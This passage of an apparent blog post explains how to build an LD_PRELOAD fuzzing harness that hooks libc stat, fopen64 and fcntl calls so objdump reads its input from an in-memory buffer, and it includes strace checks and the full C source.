// Definitions for our in-memory inputs 
#define INPUT_SZ_ADDR   0x1336000
#define INPUT_ADDR      0x1337000
#define MAX_INPUT_SZ    (1024 * 1024)

// For testing purposes, we read /bin/ed into our input buffer to simulate
// what the fuzzer would do
#define  TEST_FILE      "/bin/ed"

// Our "legit" global stat struct
struct stat st;

// Declare a prototype for the real stat as a function pointer
typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
__xstat_t real_xstat = NULL;

// Returns memory address of *next* location of symbol in library search order
static void *_resolve_symbol(const char *symbol) {
    // Clear previous errors
    dlerror();

    // Get symbol address
    void* addr = dlsym(RTLD_NEXT, symbol);

    // Check for error
    char* err = NULL;
    err = dlerror();
    if (err) {
        addr = NULL;
        printf("Err resolving '%s' addr: %s\n", symbol, err);
        exit(-1);
    }
    
    return addr;
}

// Hook for __xstat 
int __xstat(int __ver, const char* __filename, struct stat* __stat_buf) {
    // Resolve the real __xstat() on demand and maybe multiple times!
    if (!real_xstat) {
        real_xstat = _resolve_symbol("__xstat");
    }

    // Assume the worst, always
    int ret = -1;

    // Special __ver value check to see if we're calling from constructor
    if (0x1337 == __ver) {
        // Patch back up the version value before sending to real xstat
        __ver = 1;

        ret = real_xstat(__ver, __filename, __stat_buf);

        // Set the real_xstat back to NULL
        real_xstat = NULL;
        return ret;
    }

    // Determine if we're stat'ing our fuzzing target
    if (!strcmp(__filename, FUZZ_TARGET)) {
        // Update our global stat struct
        st.st_size = *(size_t *)INPUT_SZ_ADDR;

        // Send it back to the caller, skip syscall
        memcpy(__stat_buf, &st, sizeof(struct stat));
        ret = 0;
    }

    // Just a normal stat, send to real xstat
    else {
        ret = real_xstat(__ver, __filename, __stat_buf);
    }

    return ret;
}

// Map memory to hold our inputs in memory and information about their size
static void _create_mem_mappings(void) {
    void *result = NULL;

    // Map the page to hold the input size
    result = mmap(
        (void *)(INPUT_SZ_ADDR),
        sizeof(size_t),
        PROT_READ | PROT_WRITE,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
        0,
        0
    );
    if ((MAP_FAILED == result) || (result != (void *)INPUT_SZ_ADDR)) {
        printf("Err mapping INPUT_SZ_ADDR, mapped @ %p\n", result);
        exit(-1);
    }

    // Let's actually initialize the value at the input size location as well
    *(size_t *)INPUT_SZ_ADDR = 0;

    // Map the pages to hold the input contents
    result = mmap(
        (void *)(INPUT_ADDR),
        (size_t)(MAX_INPUT_SZ),
        PROT_READ | PROT_WRITE,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
        0,
        0
    );
    if ((MAP_FAILED == result) || (result != (void *)INPUT_ADDR)) {
        printf("Err mapping INPUT_ADDR, mapped @ %p\n", result);
        exit(-1);
    }

    // Init the value
    memset((void *)INPUT_ADDR, 0, (size_t)MAX_INPUT_SZ);
}

// Create a "legit" stat struct globally to pass to callers
static void _setup_stat_struct(void) {
    int result = __xstat(0x1337, FUZZ_TARGET, &st);
    if (-1 == result) {
        printf("Error creating stat struct for '%s' during load\n", FUZZ_TARGET);
    }
}

// Used for testing, load /bin/ed into the input buffer and update its size info
#ifdef TEST
static void _test_func(void) {    
    // Open TEST_FILE for reading
    int fd = open(TEST_FILE, O_RDONLY);
    if (-1 == fd) {
        printf("Failed to open '%s' during test\n", TEST_FILE);
        exit(-1);
    }

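    // Attempt to read max input buf size
    ssize_t bytes = read(fd, (void*)INPUT_ADDR, (size_t)MAX_INPUT_SZ);
    close(fd);

    // Bail if the read failed, otherwise -1 would become a huge size_t
    if (bytes < 0) {
        printf("Failed to read '%s' during test\n", TEST_FILE);
        exit(-1);
    }

    // Update the input size
    *(size_t *)INPUT_SZ_ADDR = (size_t)bytes;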
}
#endif

// Routine to be called when our shared object is loaded
__attribute__((constructor)) static void _hook_load(void) {
    // Create memory mappings to hold our input and information about its size
    _create_mem_mappings();

    // Setup global "legit" stat struct
    _setup_stat_struct();

    // If we're testing, load /bin/ed up into our input buffer and update size
#ifdef TEST
    _test_func();
#endif
}

Now if we run this under strace, we notice that our two stat() calls are conspicuously missing.

close(3)                                = 0
openat(AT_FDCWD, "fuzzme", O_RDONLY)    = 3
fcntl(3, F_GETFD)                       = 0
fcntl(3, F_SETFD, FD_CLOEXEC)           = 0

We no longer see the stat() calls before the openat() and the program does not break in any significant way. So this hook seems to be working appropriately. We now need to handle the openat() and make sure we don’t actually interact with our input file, but instead trick objdump to interact with our input in memory.

Finding a Way to Hook `openat()`

My non-expert intuition tells me there are probably a few ways in which a libc function could end up calling openat() under the hood. Those ways might include the wrappers open() as well as fopen(). We also need to be mindful of their 64 variants (open64(), fopen64()). I decided to try the fopen() hooks first:

// Declare prototype for the real fopen and its friend fopen64 
typedef FILE* (*fopen_t)(const char* pathname, const char* mode);
fopen_t real_fopen = NULL;

typedef FILE* (*fopen64_t)(const char* pathname, const char* mode);
fopen64_t real_fopen64 = NULL;

...

// Exploratory hooks to see if we're using fopen() related functions to open
// our input file
FILE* fopen(const char* pathname, const char* mode) {
    printf("** fopen() called for '%s'\n", pathname);
    exit(0);
}

FILE* fopen64(const char* pathname, const char* mode) {
    printf("** fopen64() called for '%s'\n", pathname);
    exit(0);
}

If we compile and run our exploratory hooks, we get the following output:

h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme
** fopen64() called for 'fuzzme'

Bingo, dino DNA.

So now we can flesh that hooked function out a bit to behave how we want.

Refining an `fopen64()` Hook

The definition for fopen64() matches that of fopen(): FILE *fopen(const char *restrict pathname, const char *restrict mode);. The returned FILE * poses a slight problem to us because this is an opaque data structure that is not meant to be understood by the caller. Which is to say, the caller is not meant to access any members of this data structure or worry about its layout in any way. You’re just supposed to use the returned FILE * as an object to pass to other functions, such as fclose(). The system deals with the data structure there in those types of related functions so that programmers don’t have to worry about a specific implementation.

We don’t actually know how the returned FILE * will be used, it may not be used at all, or it may be passed to a function such as fread() so we need a way to return a convincing FILE * data structure to the caller that is actually built from our input in memory and NOT from the input file. Luckily, there is a libc function called fmemopen() which behaves very similarly to fopen() and also returns a FILE *. So we can go ahead and create a FILE * to return to callers of fopen64() with fuzzme as the target input file. Shoutout to @domenuk for showing me fmemopen(), I had never come across it before.

There is one key difference though. fopen() will actually obtain a file descriptor for the underlying file and fmemopen(), since it is not actually opening a file, will not. So somewhere in the FILE * data structure, there is a file descriptor for the underlying file if returned from fopen() and there isn’t one if returned from fmemopen(). This is very important as functions such as int fileno(FILE *stream) can parse a FILE * and return its underlying file descriptor to the caller. Objdump may want to do this for some reason and we need to be able to robustly handle it. So we need a way to know if someone is trying to use our faked FILE * underlying file descriptor.

My idea for this was to simply find the struct member containing the file descriptor in the FILE * returned from fmemopen() and change it to be something ridiculous like 1337 so that if objdump ever tried to use that file descriptor we would know the source of it and could try to hook any interactions with the file descriptor. So now our fopen64() hook should look as follows:

// Our fopen hook, return a FILE* to the caller, also, if we are opening our
// target make sure we're not able to write to the file
FILE* fopen64(const char* pathname, const char* mode) {
    // Resolve symbol on demand and only once
    if (NULL == real_fopen64) {
        real_fopen64 = _resolve_symbol("fopen64");
    }

    // Check to see what file we're opening
    FILE* ret = NULL;
    if (!strcmp(FUZZ_TARGET, pathname)) {
        // We're trying to open our file, make sure it's a read-only mode
        if (strcmp(mode, "r")) {
            printf("Attempt to open fuzz-target in illegal mode: '%s'\n", mode);
            exit(-1);
        }

        // Open shared memory FILE* and return to caller
        ret = fmemopen((void*)INPUT_ADDR, *(size_t*)INPUT_SZ_ADDR, mode);
        if (NULL == ret) {
            printf("fmemopen() failed for fuzzing target\n");
            exit(-1);
        }
        
        // Make sure we've never fopen()'d our fuzzing target before
        if (faked_fp) {
            printf("Attempting to fopen64() fuzzing target more than once\n");
            exit(-1);
        }

        // Update faked_fp
        faked_fp = ret;

        // Change the filedes to something we know
        ret->_fileno = 1337;
    }

    // We're not opening our file, send to regular fopen
    else {
        ret = real_fopen64(pathname, mode);
    }

    // Return FILE stream ptr to caller
    return ret;
}

You can see we:

Resolve the symbol location if it hasn’t been yet
Check to see if we’re being called on our fuzzing target input file
Call fmemopen() and open the memory buffer where our current input is in memory along with the input’s size

You may also notice a few safety checks as well to make sure things don’t go unnoticed. We have a global variable, FILE *faked_fp, that we initialize to NULL, which lets us know if we’ve ever opened our input more than once (it wouldn’t be NULL anymore on subsequent attempts to open it).

We also do a check on the mode argument to make sure we’re getting a read-only FILE * back. We don’t want objdump to alter our input or write to it in any way and if it tries to, we need to know about it.

Running our shared object at this point nets us the following output:

h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme
objdump: fuzzme: Bad file descriptor

My spidey-sense is telling me something tried to interact with a file descriptor of 1337. Let’s run again under strace and see what happens.

h0mbre@ubuntu:~/blogpost$ strace -E LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme > /tmp/output.txt

In the output, we can see some syscalls to fcntl() and fstat() both being called with a file descriptor of 1337 which obviously doesn’t exist in our objdump process, so we’ve been able to find the problem.

fcntl(1337, F_GETFD)                    = -1 EBADF (Bad file descriptor)
prlimit64(0, RLIMIT_NOFILE, NULL, {rlim_cur=4*1024, rlim_max=4*1024}) = 0
fstat(1337, 0x7fff4bf54c90)             = -1 EBADF (Bad file descriptor)
fstat(1337, 0x7fff4bf54bf0)             = -1 EBADF (Bad file descriptor)

As we’ve already learned, there is no direct export in libc for fstat(), it’s one of those weird ones like stat() and we actually have to hook __fxstat(). So let’s try and hook that to see if it gets called for our 1337 file descriptor. The hook function will look like this to start:

// Declare prototype for the real __fxstat
typedef int (*__fxstat_t)(int __ver, int __filedesc, struct stat *__stat_buf);
__fxstat_t real_fxstat = NULL;

...

// Hook for __fxstat
int __fxstat (int __ver, int __filedesc, struct stat *__stat_buf) {
    printf("** __fxstat() called for __filedesc: %d\n", __filedesc);
    exit(0);
}

We also still have that fcntl() to deal with. Luckily that hook is straightforward: if someone asks for F_GETFD, aka the flags associated with that special 1337 file descriptor, we’ll simply return O_RDONLY as those were the flags it was “opened” with. (Strictly speaking, F_GETFD reports descriptor flags such as FD_CLOEXEC rather than the open mode, but O_RDONLY is 0, so the caller just sees that no descriptor flags are set.) We’ll just panic for now if someone calls it for a different file descriptor. This hook looks like this:

// Declare prototype for the real __fcntl
typedef int (*fcntl_t)(int fildes, int cmd, ...);
fcntl_t real_fcntl = NULL;

...

// Hook for fcntl
int fcntl(int fildes, int cmd, ...) {
    // Resolve fcntl symbol if needed
    if (NULL == real_fcntl) {
        real_fcntl = _resolve_symbol("fcntl");
    }

    if (fildes == 1337) {
        return O_RDONLY;
    }

    else {
        printf("** fcntl() called for real file descriptor\n");
        exit(0);
    }
}
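For reference, fcntl() has two different “get flags” commands, and it is worth seeing what each one returns on a real descriptor. The sketch below is a standalone experiment, not part of the harness; query_fd_flags is a made-up name and /dev/null is just a convenient file to open.

```c
#include <fcntl.h>
#include <unistd.h>

// Open /dev/null read-only and report what the two fcntl() queries return.
// Returns 0 on success, -1 if the open failed.
int query_fd_flags(int *fd_flags, int *access_mode) {
    int fd = open("/dev/null", O_RDONLY);
    if (fd == -1) {
        return -1;
    }

    // F_GETFD: descriptor flags, currently just FD_CLOEXEC
    *fd_flags = fcntl(fd, F_GETFD);

    // F_GETFL: file status flags, masked down to the access mode
    *access_mode = fcntl(fd, F_GETFL) & O_ACCMODE;

    close(fd);
    return 0;
}
```

Since O_RDONLY is 0, returning it from the hook for an F_GETFD query is indistinguishable from reporting that no descriptor flags are set. If objdump ever issued F_GETFL against the fake descriptor, the same return value would read as a read-only access mode.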

Running this under strace now, the fcntl() call is absent as we would expect:

openat(AT_FDCWD, "/usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=26376, ...}) = 0
mmap(NULL, 26376, PROT_READ, MAP_SHARED, 3, 0) = 0x7ff61d331000
close(3)                                = 0
prlimit64(0, RLIMIT_NOFILE, NULL, {rlim_cur=4*1024, rlim_max=4*1024}) = 0
fstat(1, {st_mode=S_IFREG|0664, st_size=0, ...}) = 0
write(1, "** __fxstat() called for __filed"..., 42) = 42
exit_group(0)                           = ?
+++ exited with 0 +++

Now we can flesh out our __fxstat() hook with some logic. The caller is hoping to retrieve a stat struct from the function for our fuzzing target fuzzme by passing the special file descriptor 1337. Luckily, we have our global stat struct that we can return after we update its size to match that of the current input in memory (as tracked by us and the fuzzer as the value at INPUT_SZ_ADDR). So if called, we simply update our stat struct size, and memcpy our struct into their *__stat_buf. Our complete hook now looks like this:

// Hook for __fxstat
int __fxstat (int __ver, int __filedesc, struct stat *__stat_buf) {
    // Resolve the real fxstat
    if (NULL == real_fxstat) {
        real_fxstat = _resolve_symbol("__fxstat");
    }

    int ret = -1;

    // Check to see if we're stat'ing our fuzz target
    if (1337 == __filedesc) {
        // Patch the global struct with current input size
        st.st_size = *(size_t*)INPUT_SZ_ADDR;

        // Copy global stat struct back to caller
        memcpy(__stat_buf, &st, sizeof(struct stat));
        ret = 0;
    }

    // Normal stat, send to real fxstat
    else {
        ret = real_fxstat(__ver, __filedesc, __stat_buf);
    }

    return ret;
}

Now if we run this, we actually don’t break and objdump is able to exit cleanly under strace.

Wrapping Up

To test whether or not we have done a fair job, we will go ahead and output objdump -D fuzzme to a file, and then we’ll go ahead and output the same command but with our harness shared object loaded. Lastly, we’ll run objdump -D /bin/ed and output to a file to see if our harness created the same output.

h0mbre@ubuntu:~/blogpost$ objdump -D fuzzme > /tmp/fuzzme_original.txt      
h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme > /tmp/harness.txt 
h0mbre@ubuntu:~/blogpost$ objdump -D /bin/ed > /tmp/ed.txt

Then we sha1sum the files:

h0mbre@ubuntu:~/blogpost$ sha1sum /tmp/fuzzme_original.txt /tmp/harness.txt /tmp/ed.txt 
938518c86301ab00ddf6a3ef528d7610fa3fd05a  /tmp/fuzzme_original.txt
add4e6c3c298733f48fbfe143caee79445c2f196  /tmp/harness.txt
10454308b672022b40f6ce5e32a6217612b462c8  /tmp/ed.txt

We actually get three different hashes. We wanted the harness and /bin/ed runs to produce the same output, since /bin/ed is the input we loaded into memory.

h0mbre@ubuntu:~/blogpost$ ls -laht /tmp
total 14M
drwxrwxrwt 28 root   root   128K Apr  3 08:44 .
-rw-rw-r--  1 h0mbre h0mbre 736K Apr  3 08:43 ed.txt
-rw-rw-r--  1 h0mbre h0mbre 736K Apr  3 08:43 harness.txt
-rw-rw-r--  1 h0mbre h0mbre 2.2M Apr  3 08:42 fuzzme_original.txt

Ah, they are the same length at least, that must mean there is a subtle difference and diff shows us why the hashes aren’t the same:

h0mbre@ubuntu:~/blogpost$ diff /tmp/ed.txt /tmp/harness.txt 
2c2
< /bin/ed:     file format elf64-x86-64
---
> fuzzme:     file format elf64-x86-64

The name of the file in the argv[] array is different, so that’s the only difference. In the end we were able to feed objdump an input file, but have it actually take input from an in-memory buffer in our harness.

One more thing, we actually forgot that objdump closes our file didn’t we! So I went ahead and added a quick fclose() hook. We wouldn’t have any problems if fclose() just wanted to free the heap memory associated with our fmemopen() returned FILE *; however, it would also probably try to call close() on that wonky file descriptor as well and we don’t want that. It might not even matter in the end, just want to be safe. Up to the reader to experiment and see what changes. The imaginary fuzzer should restore FILE * heap memory anyways during its snapshot restoration routine.

Conclusion

There are a million different ways to accomplish this goal, I just wanted to walk you through my thought process. There are actually a lot of cool things you can do with this harness. One thing I’ve done is hook malloc() to fail on large allocations so that I don’t waste fuzzing cycles on things that will eventually time out. You can also create an atexit() choke point so that the program executes your atexit() handler every time it exits normally, which can be useful for snapshot resets if the program can take multiple exit paths, as you only have to cover the one exit point.
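To illustrate the choke point idea, here is a small standalone sketch, assuming the handler is registered with the standard atexit(). It forks a child that leaves through one of two different exit() calls and checks that the same handler ran either way. The function names and the pipe-based signalling are mine; a real harness would do its snapshot bookkeeping inside the handler instead.

```c
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

static int notify_fd = -1;

// Single choke point: runs on every exit() path and on return from main()
static void on_exit_chokepoint(void) {
    if (notify_fd != -1) {
        ssize_t r = write(notify_fd, "X", 1);
        (void)r;
    }
}

// Fork a child that exits via one of two paths and report whether the
// handler ran. Returns 1 if it ran, 0 if not, -1 on setup failure.
int handler_ran_for_exit_path(int path) {
    int fds[2];
    if (pipe(fds) == -1) {
        return -1;
    }

    pid_t pid = fork();
    if (pid == -1) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }

    if (pid == 0) {
        // Child: register the handler, then leave through the chosen path
        close(fds[0]);
        notify_fd = fds[1];
        if (atexit(on_exit_chokepoint) != 0) {
            _exit(2);
        }
        if (path == 0) {
            exit(0);  // "success" path
        }
        exit(1);      // "error" path
    }

    // Parent: the handler writes one byte if it ran
    close(fds[1]);
    char c = 0;
    ssize_t n = read(fds[0], &c, 1);
    close(fds[0]);
    waitpid(pid, NULL, 0);
    return (n == 1 && c == 'X') ? 1 : 0;
}
```

One caveat: handlers registered with atexit() do not run if the program calls _exit() directly or dies from a signal, so those paths would still need their own coverage.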

Hopefully this was useful to some! The complete code to the harness is below, happy fuzzing!

/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/

#define _GNU_SOURCE     /* dlsym */
#include <stdio.h> /* printf */
#include <sys/stat.h> /* stat */
#include <stdlib.h> /* exit */
#include <unistd.h> /* __xstat, __fxstat */
#include <dlfcn.h> /* dlsym and friends */
#include <sys/mman.h> /* mmap */
#include <string.h> /* memset */
#include <fcntl.h> /* open */

// Filename of the input file we're trying to emulate
#define FUZZ_TARGET     "fuzzme"

// Definitions for our in-memory inputs 
#define INPUT_SZ_ADDR   0x1336000
#define INPUT_ADDR      0x1337000
#define MAX_INPUT_SZ    (1024 * 1024)

// For testing purposes, we read /bin/ed into our input buffer to simulate
// what the fuzzer would do
#define  TEST_FILE      "/bin/ed"

// Our "legit" global stat struct
struct stat st;

// FILE * returned to callers of fopen64() 
FILE *faked_fp = NULL;

// Declare a prototype for the real stat as a function pointer
typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
__xstat_t real_xstat = NULL;

// Declare prototype for the real fopen and its friend fopen64 
typedef FILE* (*fopen_t)(const char* pathname, const char* mode);
fopen_t real_fopen = NULL;

typedef FILE* (*fopen64_t)(const char* pathname, const char* mode);
fopen64_t real_fopen64 = NULL;

// Declare prototype for the real __fxstat
typedef int (*__fxstat_t)(int __ver, int __filedesc, struct stat *__stat_buf);
__fxstat_t real_fxstat = NULL;

// Declare prototype for the real __fcntl
typedef int (*fcntl_t)(int fildes, int cmd, ...);
fcntl_t real_fcntl = NULL;

// Returns memory address of *next* location of symbol in library search order
static void *_resolve_symbol(const char *symbol) {
    // Clear previous errors
    dlerror();

    // Get symbol address
    void* addr = dlsym(RTLD_NEXT, symbol);

    // Check for error
    char* err = NULL;
    err = dlerror();
    if (err) {
        addr = NULL;
        printf("** Err resolving '%s' addr: %s\n", symbol, err);
        exit(-1);
    }
    
    return addr;
}

// Hook for __xstat 
int __xstat(int __ver, const char* __filename, struct stat* __stat_buf) {
    // Resolve the real __xstat() on demand and maybe multiple times!
    if (!real_xstat) {
        real_xstat = _resolve_symbol("__xstat");
    }

    // Assume the worst, always
    int ret = -1;

    // Special __ver value check to see if we're calling from constructor
    if (0x1337 == __ver) {
        // Patch back up the version value before sending to real xstat
        __ver = 1;

        ret = real_xstat(__ver, __filename, __stat_buf);

        // Set the real_xstat back to NULL
        real_xstat = NULL;
        return ret;
    }

    // Determine if we're stat'ing our fuzzing target
    if (!strcmp(__filename, FUZZ_TARGET)) {
        // Update our global stat struct
        st.st_size = *(size_t *)INPUT_SZ_ADDR;

        // Send it back to the caller, skip syscall
        memcpy(__stat_buf, &st, sizeof(struct stat));
        ret = 0;
    }

    // Just a normal stat, send to real xstat
    else {
        ret = real_xstat(__ver, __filename, __stat_buf);
    }

    return ret;
}

// Exploratory hooks to see if we're using fopen() related functions to open
// our input file
FILE* fopen(const char* pathname, const char* mode) {
    printf("** fopen() called for '%s'\n", pathname);
    exit(0);
}

// Our fopen hook, return a FILE* to the caller, also, if we are opening our
// target make sure we're not able to write to the file
FILE* fopen64(const char* pathname, const char* mode) {
    // Resolve symbol on demand and only once
    if (NULL == real_fopen64) {
        real_fopen64 = _resolve_symbol("fopen64");
    }

    // Check to see what file we're opening
    FILE* ret = NULL;
    if (!strcmp(FUZZ_TARGET, pathname)) {
        // We're trying to open our file, make sure it's a read-only mode
        if (strcmp(mode, "r")) {
            printf("** Attempt to open fuzz-target in illegal mode: '%s'\n", mode);
            exit(-1);
        }

        // Make sure we've never fopen()'d our fuzzing target before
        if (faked_fp) {
            printf("** Attempting to fopen64() fuzzing target more than once\n");
            exit(-1);
        }

        // Open shared memory FILE* and return to caller
        ret = fmemopen((void*)INPUT_ADDR, *(size_t*)INPUT_SZ_ADDR, mode);
        if (NULL == ret) {
            printf("** Err fmemopen() failed for fuzz-target\n");
            exit(-1);
        }

        // Update faked_fp
        faked_fp = ret;

        // Change the filedes to something we know
        ret->_fileno = 1337;
    }

    // We're not opening our file, send to regular fopen64
    else {
        ret = real_fopen64(pathname, mode);
    }

    // Return FILE stream ptr to caller
    return ret;
}

// Hook for __fxstat
int __fxstat (int __ver, int __filedesc, struct stat *__stat_buf) {
    // Resolve the real fxstat
    if (NULL == real_fxstat) {
        real_fxstat = _resolve_symbol("__fxstat");
    }

    int ret = -1;

    // Check to see if we're stat'ing our fuzz target
    if (1337 == __filedesc) {
        // Patch the global struct with current input size
        st.st_size = *(size_t*)INPUT_SZ_ADDR;

        // Copy global stat struct back to caller
        memcpy(__stat_buf, &st, sizeof(struct stat));
        ret = 0;
    }

    // Normal stat, send to real fxstat
    else {
        ret = real_fxstat(__ver, __filedesc, __stat_buf);
    }

    return ret;
}

// Hook for fcntl
int fcntl(int fildes, int cmd, ...) {
    // Resolve fcntl symbol if needed
    if (NULL == real_fcntl) {
        real_fcntl = _resolve_symbol("fcntl");
    }

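    // Any query against our fake descriptor reports a read-only file,
    // regardless of `cmd`
    if (fildes == 1337) {
        return O_RDONLY;
    }

    // Exploratory: bail out loudly if the target calls fcntl() on anything
    // else so we learn about it; real_fcntl is resolved but not yet used
    else {
        printf("** fcntl() called for real file descriptor\n");
        exit(0);
    }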
}

// Map memory to hold our inputs in memory and information about their size
static void _create_mem_mappings(void) {
    void *result = NULL;

    // Map the page to hold the input size
    result = mmap(
        (void *)(INPUT_SZ_ADDR),
        sizeof(size_t),
        PROT_READ | PROT_WRITE,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
        -1, // fd is ignored for MAP_ANONYMOUS; -1 is the portable value
        0
    );
    if ((MAP_FAILED == result) || (result != (void *)INPUT_SZ_ADDR)) {
        printf("** Err mapping INPUT_SZ_ADDR, mapped @ %p\n", result);
        exit(-1);
    }

    // Let's actually initialize the value at the input size location as well
    *(size_t *)INPUT_SZ_ADDR = 0;

    // Map the pages to hold the input contents
    result = mmap(
        (void *)(INPUT_ADDR),
        (size_t)(MAX_INPUT_SZ),
        PROT_READ | PROT_WRITE,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
        -1, // fd is ignored for MAP_ANONYMOUS; -1 is the portable value
        0
    );
    if ((MAP_FAILED == result) || (result != (void *)INPUT_ADDR)) {
        printf("** Err mapping INPUT_ADDR, mapped @ %p\n", result);
        exit(-1);
    }

    // Init the value
    memset((void *)INPUT_ADDR, 0, (size_t)MAX_INPUT_SZ);
}

// Create a "legit" stat struct globally to pass to callers
static void _setup_stat_struct(void) {
    int result = __xstat(0x1337, FUZZ_TARGET, &st);
    if (-1 == result) {
        printf("** Err creating stat struct for '%s' during load\n", FUZZ_TARGET);
        exit(-1);
    }
}

// Used for testing, load /bin/ed into the input buffer and update its size info
#ifdef TEST
static void _test_func(void) {    
    // Open TEST_FILE for reading
    int fd = open(TEST_FILE, O_RDONLY);
    if (-1 == fd) {
        printf("** Failed to open '%s' during test\n", TEST_FILE);
        exit(-1);
    }

    // Attempt to read max input buf size
    ssize_t bytes = read(fd, (void*)INPUT_ADDR, (size_t)MAX_INPUT_SZ);
    close(fd);
    if (-1 == bytes) {
        printf("** Failed to read '%s' during test\n", TEST_FILE);
        exit(-1);
    }

    // Update the input size
    *(size_t *)INPUT_SZ_ADDR = (size_t)bytes;
}
#endif

// Routine to be called when our shared object is loaded
__attribute__((constructor)) static void _hook_load(void) {
    // Create memory mappings to hold our input and information about its size
    _create_mem_mappings();

    // Setup global "legit" stat struct
    _setup_stat_struct();

    // If we're testing, load /bin/ed up into our input buffer and update size
#ifdef TEST
    _test_func();
#endif
}
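
The `fopen64()` hook above relies on `fmemopen()` to hand the target a `FILE*` that is backed by memory instead of a file on disk. Here is a minimal, standalone sketch of just that idea. The helper name `read_from_memory` and its parameters are hypothetical and exist only for illustration; they are not part of the hook library.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

// Hypothetical helper (not part of the hook library above): wrap an in-memory
// buffer in a read-only FILE* and read back up to `out_sz` bytes.
// Returns the number of bytes read, or (size_t)-1 if fmemopen() fails.
size_t read_from_memory(const void *buf, size_t buf_sz,
                        void *out, size_t out_sz) {
    // fmemopen() takes a non-const pointer, but mode "r" never writes to it
    FILE *fp = fmemopen((void *)buf, buf_sz, "r");
    if (NULL == fp) {
        return (size_t)-1;
    }

    // The stream behaves like a file whose contents are exactly `buf`
    size_t n = fread(out, 1, out_sz, fp);

    fclose(fp);
    return n;
}
```

Calling `read_from_memory("hello", 5, out, sizeof(out))` with a 16-byte `out` buffer copies those five bytes and returns 5. A stream created this way has no kernel file descriptor behind it, which is why the hook stamps a sentinel value into `_fileno` so the `__fxstat()` and `fcntl()` hooks can recognize it later.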
